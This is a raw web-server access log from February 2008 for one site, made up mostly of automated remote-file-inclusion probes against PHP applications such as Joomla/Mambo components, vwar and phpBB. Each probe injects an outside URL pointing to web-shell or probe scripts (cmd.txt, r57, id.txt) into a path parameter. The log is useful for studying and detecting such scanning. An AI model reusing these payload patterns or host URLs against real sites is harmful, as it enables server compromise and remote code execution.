63.139.243.11 - - [19/Feb/2008:06:26:29 -0800] "GET /logs/access_080103.log//modules/Neos_Chronos/header.php?base_folder=http://www.partyanimals.nl/uploads/yes.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
65.55.104.169 - - [19/Feb/2008:06:26:48 -0800] "GET /presto/?S=A HTTP/1.1" 200 526 "-" "msnbot/1.0 (+http://search.msn.com/msnbot.htm)" "www.dmulk.com"
82.160.11.72 - - [19/Feb/2008:06:26:58 -0800] "GET /logs/access_080117.log/claroline/inc/claro_init_header.inc.php?includePath=http://www.zuuniimedee.mn///modules/My_eGallery/data/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
82.160.11.72 - - [19/Feb/2008:06:26:59 -0800] "GET /logs/claroline/inc/claro_init_header.inc.php?includePath=http://www.zuuniimedee.mn///modules/My_eGallery/data/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
69.22.162.60 - - [19/Feb/2008:06:27:06 -0800] "GET /logs/access_071230.log//modules/vwar/admin/admin.php?vwar_root=http://www.identification.net/docs/log/read.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
69.22.162.60 - - [19/Feb/2008:06:27:06 -0800] "GET /logs//modules/vwar/admin/admin.php?vwar_root=http://www.identification.net/docs/log/read.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
205.234.130.198 - - [19/Feb/2008:06:27:31 -0800] "GET /logs/access_080201.log//?mosConfig_absolute_path=http://www.fgwarez.com/bbs/skin/ting_music/.../usa?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
205.234.130.198 - - [19/Feb/2008:06:27:31 -0800] "GET //?mosConfig_absolute_path=http://www.fgwarez.com/bbs/skin/ting_music/.../usa?? HTTP/1.1" 200 2962 "-" "libwww-perl/5.808" "www.dmulk.com"
205.234.130.198 - - [19/Feb/2008:06:27:32 -0800] "GET /logs//?mosConfig_absolute_path=http://www.fgwarez.com/bbs/skin/ting_music/.../usa?? HTTP/1.1" 200 35263 "-" "libwww-perl/5.808" "www.dmulk.com"
69.64.76.29 - - [19/Feb/2008:06:27:44 -0800] "GET /administrator/components/com_mgm/help.mgm.php?mosConfig_absolute_path=http://www.j-vision.co.kr/company/rhe/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
80.74.145.108 - - [19/Feb/2008:06:28:06 -0800] "GET /logs/access_080201.log//excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=http://www.fgwarez.com/bbs/skin/ting_music/.../usa?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
80.74.145.108 - - [19/Feb/2008:06:28:06 -0800] "GET //excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=http://www.fgwarez.com/bbs/skin/ting_music/.../usa?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
80.74.145.108 - - [19/Feb/2008:06:28:06 -0800] "GET /logs//excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=http://www.fgwarez.com/bbs/skin/ting_music/.../usa?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
74.6.26.166 - - [19/Feb/2008:06:28:17 -0800] "GET /logs/?M=A HTTP/1.0" 200 35971 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
74.6.26.232 - - [19/Feb/2008:06:28:22 -0800] "GET /logs/access_071213.log HTTP/1.0" 200 79346 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
24.176.255.158 - - [19/Feb/2008:06:28:25 -0800] "GET /logs/access_080122.log//components/com_zoom/classes/iptc/EXIF_.php?mosConfig_absolute_path=http://ecology.275mb.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
24.176.255.158 - - [19/Feb/2008:06:28:25 -0800] "GET //components/com_zoom/classes/iptc/EXIF_.php?mosConfig_absolute_path=http://ecology.275mb.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
24.176.255.158 - - [19/Feb/2008:06:28:25 -0800] "GET /logs//components/com_zoom/classes/iptc/EXIF_.php?mosConfig_absolute_path=http://ecology.275mb.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
69.22.162.60 - - [19/Feb/2008:06:28:33 -0800] "GET /logs/access_071230.log//modules/vwar/admin/admin.php?vwar_root=http://www.identification.net/docs/log/read.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
69.22.162.60 - - [19/Feb/2008:06:28:33 -0800] "GET /logs//modules/vwar/admin/admin.php?vwar_root=http://www.identification.net/docs/log/read.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
205.234.130.198 - - [19/Feb/2008:06:28:47 -0800] "GET /logs/access_071225.log//administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://www.fgwarez.com/bbs/skin/ting_music/.../usa?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
205.234.130.198 - - [19/Feb/2008:06:28:47 -0800] "GET //administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://www.fgwarez.com/bbs/skin/ting_music/.../usa?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
205.234.130.198 - - [19/Feb/2008:06:28:47 -0800] "GET /logs//administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://www.fgwarez.com/bbs/skin/ting_music/.../usa?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
64.34.176.201 - - [19/Feb/2008:06:28:54 -0800] "GET /logs//phpSecurePages/secure.php?&cfgProgDir=http://www.wakejunkies.com/mambots/content/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; cs-CZ; rv:1.7.12) Gecko/20050929" "www.dmulk.com"
64.34.176.201 - - [19/Feb/2008:06:28:54 -0800] "GET //phpSecurePages/secure.php?&cfgProgDir=http://www.wakejunkies.com/mambots/content/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.10) Gecko/20050716 Firefox/1.0.6" "www.dmulk.com"
217.13.86.23 - - [19/Feb/2008:06:29:10 -0800] "GET /administrator/components/com_mgm/help.mgm.php?mosConfig_absolute_path=http://www.j-vision.co.kr/company/rhe/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
74.52.238.34 - - [19/Feb/2008:06:29:21 -0800] "GET /logs/access_080122.log//mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.beautiful-atlanta.com/admin/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
74.52.238.34 - - [19/Feb/2008:06:29:22 -0800] "GET //mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.beautiful-atlanta.com/admin/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
74.52.238.34 - - [19/Feb/2008:06:29:22 -0800] "GET /logs//mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.beautiful-atlanta.com/admin/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
63.139.243.11 - - [19/Feb/2008:06:29:32 -0800] "GET /logs/access_080103.log//phpsecurityadmin/include/logout.php?PSA_PATH=http://www.partyanimals.nl/uploads/yes.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
63.139.243.11 - - [19/Feb/2008:06:29:32 -0800] "GET //phpsecurityadmin/include/logout.php?PSA_PATH=http://www.partyanimals.nl/uploads/yes.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
63.139.243.11 - - [19/Feb/2008:06:29:32 -0800] "GET /logs//phpsecurityadmin/include/logout.php?PSA_PATH=http://www.partyanimals.nl/uploads/yes.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
206.221.184.180 - - [19/Feb/2008:06:29:34 -0800] "GET /logs//classes/adodbt/sql.php?classes_dir=http://www.geocities.com/ntcinfo/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "www.dmulk.com"
206.221.184.180 - - [19/Feb/2008:06:29:34 -0800] "GET //classes/adodbt/sql.php?classes_dir=http://www.geocities.com/ntcinfo/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "www.dmulk.com"
77.221.130.5 - - [19/Feb/2008:06:29:44 -0800] "GET /logs/access_080129.log//administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://www.wakejunkies.com/mambots/content/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
77.221.130.5 - - [19/Feb/2008:06:29:44 -0800] "GET /logs//administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://www.wakejunkies.com/mambots/content/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
211.218.149.119 - - [19/Feb/2008:06:30:08 -0800] "GET /logs/access.log/administrator/components/com_mgm/help.mgm.php?mosConfig_absolute_path=http://www.burgnarren-waldburg.de/modules/xoopsgallery/platform/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.63" "www.dmulk.com"
211.218.149.119 - - [19/Feb/2008:06:30:08 -0800] "GET /administrator/components/com_mgm/help.mgm.php?mosConfig_absolute_path=http://www.burgnarren-waldburg.de/modules/xoopsgallery/platform/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.63" "www.dmulk.com"
211.218.149.119 - - [19/Feb/2008:06:30:08 -0800] "GET /logs/administrator/components/com_mgm/help.mgm.php?mosConfig_absolute_path=http://www.burgnarren-waldburg.de/modules/xoopsgallery/platform/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.63" "www.dmulk.com"
74.54.29.114 - - [19/Feb/2008:06:30:43 -0800] "GET /logs/access_080126.log//styles/internal/header.php?tpl_pgb_moddir=http://bglradio.net//WebCalendar/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
74.54.29.114 - - [19/Feb/2008:06:30:43 -0800] "GET //styles/internal/header.php?tpl_pgb_moddir=http://bglradio.net//WebCalendar/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
74.54.29.114 - - [19/Feb/2008:06:30:44 -0800] "GET /logs//styles/internal/header.php?tpl_pgb_moddir=http://bglradio.net//WebCalendar/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
69.22.162.60 - - [19/Feb/2008:06:30:58 -0800] "GET //modules/vwar/admin/admin.php?vwar_root=http://www.identification.net/docs/log/read.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
74.52.238.34 - - [19/Feb/2008:06:31:20 -0800] "GET /logs/access_080211.log//mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.beautiful-atlanta.com/admin/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
80.93.56.188 - - [19/Feb/2008:06:31:21 -0800] "GET //administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://www.wakejunkies.com/mambots/content/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
65.55.104.169 - - [19/Feb/2008:06:31:34 -0800] "GET / HTTP/1.1" 200 2962 "-" "msnbot/1.0 (+http://search.msn.com/msnbot.htm)" "www.dmulk.com"
65.55.104.169 - - [19/Feb/2008:06:31:35 -0800] "GET /presto/?D=A HTTP/1.1" 200 526 "-" "msnbot/1.0 (+http://search.msn.com/msnbot.htm)" "www.dmulk.com"
83.223.100.182 - - [19/Feb/2008:06:31:43 -0800] "GET /index.php?option=com_comprofiler&Itemid=&mosConfig_absolute_path=http://webcal.promocall.de//tools/pr.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (compatible; Konqueror/3.1-rc3; i686 Linux; 20020515)" "www.dmulk.com"
83.223.100.182 - - [19/Feb/2008:06:31:43 -0800] "GET /logs/index.php?option=com_comprofiler&Itemid=&mosConfig_absolute_path=http://webcal.promocall.de//tools/pr.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows CE 4.21; rv:1.8b4) Gecko/20050720 Minimo/0.007" "www.dmulk.com"
205.234.130.198 - - [19/Feb/2008:06:31:58 -0800] "GET /logs/access.log//excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=http://www.fgwarez.com/bbs/skin/ting_music/.../usa?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
65.55.104.169 - - [19/Feb/2008:06:32:08 -0800] "GET /presto/?N=A HTTP/1.1" 200 526 "-" "msnbot/1.0 (+http://search.msn.com/msnbot.htm)" "www.dmulk.com"
77.221.130.5 - - [19/Feb/2008:06:32:49 -0800] "GET //administrator/components/com_juser/xajax_functions.php?mosConfig_absolute_path=http://www.wakejunkies.com/mambots/content/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
72.232.214.82 - - [19/Feb/2008:06:32:53 -0800] "GET /logs/access_080117.log//administrator/components/com_webring/admin.webring.docs.php?component_dir=http://revolution.helloweb.eu/silvio.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
72.232.214.82 - - [19/Feb/2008:06:32:53 -0800] "GET //administrator/components/com_webring/admin.webring.docs.php?component_dir=http://revolution.helloweb.eu/silvio.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
72.232.214.82 - - [19/Feb/2008:06:32:53 -0800] "GET /logs//administrator/components/com_webring/admin.webring.docs.php?component_dir=http://revolution.helloweb.eu/silvio.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
80.74.145.108 - - [19/Feb/2008:06:33:07 -0800] "GET /logs/access_080201.log//?mosConfig_absolute_path=http://www.fgwarez.com/bbs/skin/ting_music/.../usa?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
80.74.145.108 - - [19/Feb/2008:06:33:08 -0800] "GET //?mosConfig_absolute_path=http://www.fgwarez.com/bbs/skin/ting_music/.../usa?? HTTP/1.1" 200 2962 "-" "libwww-perl/5.65" "www.dmulk.com"
80.74.145.108 - - [19/Feb/2008:06:33:08 -0800] "GET /logs//?mosConfig_absolute_path=http://www.fgwarez.com/bbs/skin/ting_music/.../usa?? HTTP/1.1" 200 35992 "-" "libwww-perl/5.65" "www.dmulk.com"
66.139.79.29 - - [19/Feb/2008:06:33:57 -0800] "GET /modules/agendax/addevent.inc.php?agendax_path=http://www.cabinmagic.com/catalog/icon.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
205.234.130.198 - - [19/Feb/2008:06:33:57 -0800] "GET /logs/access.log//?mosConfig_absolute_path=http://www.fgwarez.com/bbs/skin/ting_music/.../usa?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
77.221.130.5 - - [19/Feb/2008:06:33:57 -0800] "GET /logs/access_080130.log//administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://www.wakejunkies.com/mambots/content/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
86.109.165.53 - - [19/Feb/2008:06:34:37 -0800] "GET /logs/access_080129.log//administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://www.wakejunkies.com/mambots/content/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
86.109.165.53 - - [19/Feb/2008:06:34:37 -0800] "GET /logs//administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://www.wakejunkies.com/mambots/content/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
211.218.149.119 - - [19/Feb/2008:06:34:49 -0800] "GET /logs/access_080126.log/administrator/components/com_mgm/help.mgm.php?mosConfig_absolute_path=http://www.burgnarren-waldburg.de/modules/xoopsgallery/platform/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.63" "www.dmulk.com"
205.234.130.198 - - [19/Feb/2008:06:35:13 -0800] "GET /logs/access_080118.log//components/com_ja_submit/ja_submit.html.php?mosConfig_absolute_path=http://www.fgwarez.com/bbs/skin/ting_music/.../usa?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
205.234.130.198 - - [19/Feb/2008:06:35:13 -0800] "GET //components/com_ja_submit/ja_submit.html.php?mosConfig_absolute_path=http://www.fgwarez.com/bbs/skin/ting_music/.../usa?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
205.234.130.198 - - [19/Feb/2008:06:35:13 -0800] "GET /logs//components/com_ja_submit/ja_submit.html.php?mosConfig_absolute_path=http://www.fgwarez.com/bbs/skin/ting_music/.../usa?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
69.22.162.60 - - [19/Feb/2008:06:35:17 -0800] "GET /logs/access.log//modules/vwar/admin/admin.php?vwar_root=http://www.identification.net/docs/log/read.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
77.221.130.5 - - [19/Feb/2008:06:35:43 -0800] "GET //administrator/components/com_jjgallery/admin.jjgallery.php?mosConfig_absolute_path=http://www.wakejunkies.com/mambots/content/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
69.22.162.60 - - [19/Feb/2008:06:36:08 -0800] "GET /logs/access.log//modules/vwar/admin/admin.php?vwar_root=http://www.identification.net/docs/log/read.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
86.109.165.53 - - [19/Feb/2008:06:36:22 -0800] "GET //administrator/components/com_juser/xajax_functions.php?mosConfig_absolute_path=http://www.wakejunkies.com/mambots/content/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
62.2.195.66 - - [19/Feb/2008:06:36:26 -0800] "GET //administrator/components/com_jcs/view/register.php?mosConfig_absolute_path=http://bglradio.net//WebCalendar/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
205.234.130.198 - - [19/Feb/2008:06:36:36 -0800] "GET /logs/access.log//components/com_ja_submit/ja_submit.html.php?mosConfig_absolute_path=http://www.fgwarez.com/bbs/skin/ting_music/.../usa?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
91.121.1.47 - - [19/Feb/2008:06:37:31 -0800] "GET /logs//plugins/spamx/BlackList.Examine.class.php?_CONF[path]=http://menlowstation.net/images/r57? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
70.85.198.234 - - [19/Feb/2008:06:37:51 -0800] "GET //?mosConfig_absolute_path=http://cmdz.diinoweb.com/files/cmd/id.gif?http://www.fuzi.by.ru/cmd2.txt? HTTP/1.1" 200 2962 "-" "libwww-perl/5.808" "www.dmulk.com"
70.85.198.234 - - [19/Feb/2008:06:37:58 -0800] "GET //?mosConfig_absolute_path=http://cmdz.diinoweb.com/files/cmd/id.gif?http://www.fuzi.by.ru/cmd2.txt? HTTP/1.1" 200 2962 "-" "libwww-perl/5.808" "www.dmulk.com"
86.109.165.53 - - [19/Feb/2008:06:38:24 -0800] "GET //administrator/components/com_jjgallery/admin.jjgallery.php?mosConfig_absolute_path=http://www.wakejunkies.com/mambots/content/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
212.204.202.91 - - [19/Feb/2008:06:38:29 -0800] "GET /html/modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://horseshoebendarkansas.net/blog/nucleus/libs/include/setup_pages.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
80.74.145.108 - - [19/Feb/2008:06:38:36 -0800] "GET /logs/access_080118.log//components/com_ja_submit/ja_submit.html.php?mosConfig_absolute_path=http://www.fgwarez.com/bbs/skin/ting_music/.../usa?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
80.74.145.108 - - [19/Feb/2008:06:38:37 -0800] "GET //components/com_ja_submit/ja_submit.html.php?mosConfig_absolute_path=http://www.fgwarez.com/bbs/skin/ting_music/.../usa?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
80.74.145.108 - - [19/Feb/2008:06:38:37 -0800] "GET /logs//components/com_ja_submit/ja_submit.html.php?mosConfig_absolute_path=http://www.fgwarez.com/bbs/skin/ting_music/.../usa?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
80.74.145.108 - - [19/Feb/2008:06:38:45 -0800] "GET /logs/access.log//components/com_ja_submit/ja_submit.html.php?mosConfig_absolute_path=http://www.fgwarez.com/bbs/skin/ting_music/.../usa?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
213.249.193.2 - - [19/Feb/2008:06:38:46 -0800] "GET /administrator/components/com_mgm/help.mgm.php?mosConfig_absolute_path=http://www.j-vision.co.kr/company/rhe/echo? HTTP/1.0" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
61.14.140.180 - - [19/Feb/2008:06:38:58 -0800] "GET /logs/access_080106.log/modifyform.html?code=http://www.gumgangfarm.com/shop/data/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
61.14.140.180 - - [19/Feb/2008:06:38:59 -0800] "GET /modifyform.html?code=http://www.gumgangfarm.com/shop/data/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
86.109.165.53 - - [19/Feb/2008:06:38:59 -0800] "GET /logs/access_080130.log//administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://www.wakejunkies.com/mambots/content/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
61.14.140.180 - - [19/Feb/2008:06:39:00 -0800] "GET /logs/modifyform.html?code=http://www.gumgangfarm.com/shop/data/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
61.14.140.180 - - [19/Feb/2008:06:39:17 -0800] "GET /logs/access_071224.log/modifyform.html?code=http://www.gumgangfarm.com/shop/data/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
91.121.1.47 - - [19/Feb/2008:06:39:45 -0800] "GET /logs/access_071230.log/language/lang_german/lang_main_album.php?phpbb_root_path=http://menlowstation.net/images/r57? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
80.74.145.108 - - [19/Feb/2008:06:39:55 -0800] "GET /logs/access_080123.log/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.fgwarez.com/bbs/skin/ting_music/.../usa?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
80.74.145.108 - - [19/Feb/2008:06:39:56 -0800] "GET /postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.fgwarez.com/bbs/skin/ting_music/.../usa?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
80.74.145.108 - - [19/Feb/2008:06:39:56 -0800] "GET /logs/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.fgwarez.com/bbs/skin/ting_music/.../usa?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
80.74.145.108 - - [19/Feb/2008:06:40:08 -0800] "GET /logs/access_071225.log//administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://www.fgwarez.com/bbs/skin/ting_music/.../usa?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
80.74.145.108 - - [19/Feb/2008:06:40:08 -0800] "GET //administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://www.fgwarez.com/bbs/skin/ting_music/.../usa?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
80.74.145.108 - - [19/Feb/2008:06:40:08 -0800] "GET /logs//administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://www.fgwarez.com/bbs/skin/ting_music/.../usa?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
207.58.184.170 - - [19/Feb/2008:06:40:34 -0800] "GET //administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://systemiker.org/ziegler/redaxo/final.txt?? HTTP/1.1" 404 275 "-" "Mozilla/3.0 (OS/2; U)" "www.dmulk.com"
207.58.184.170 - - [19/Feb/2008:06:40:35 -0800] "GET /logs//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://systemiker.org/ziegler/redaxo/final.txt?? HTTP/1.1" 404 275 "-" "Mozilla/3.0 (OS/2; U)" "www.dmulk.com"
80.74.145.108 - - [19/Feb/2008:06:40:55 -0800] "GET /logs/access.log//excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=http://www.fgwarez.com/bbs/skin/ting_music/.../usa?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
71.6.167.234 - - [19/Feb/2008:06:41:00 -0800] "GET /classes/core/language.php?rootdir=http://www.nedaleko.ru/en/.%20/contr.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; FreeBSD i386; en-US; rv:1.7.8) Gecko/20050609 Firefox/1.0.4" "www.dmulk.com"
71.6.167.234 - - [19/Feb/2008:06:41:00 -0800] "GET /logs/classes/core/language.php?rootdir=http://www.nedaleko.ru/en/.%20/contr.txt?? HTTP/1.1" 404 275 "-" "Mozilla/3.0 (OS/2; U)" "www.dmulk.com"
62.2.195.66 - - [19/Feb/2008:06:41:03 -0800] "GET /logs/access_080129.log//administrator/components/com_jcs/view/register.php?mosConfig_absolute_path=http://bglradio.net//WebCalendar/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
66.139.79.29 - - [19/Feb/2008:06:41:14 -0800] "GET /index.php?mosConfig_absolute_path=http://www.cabinmagic.com/catalog/icon.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
207.58.184.170 - - [19/Feb/2008:06:41:33 -0800] "GET //administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://uniquantum.co.kr/.../robot.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "www.dmulk.com"
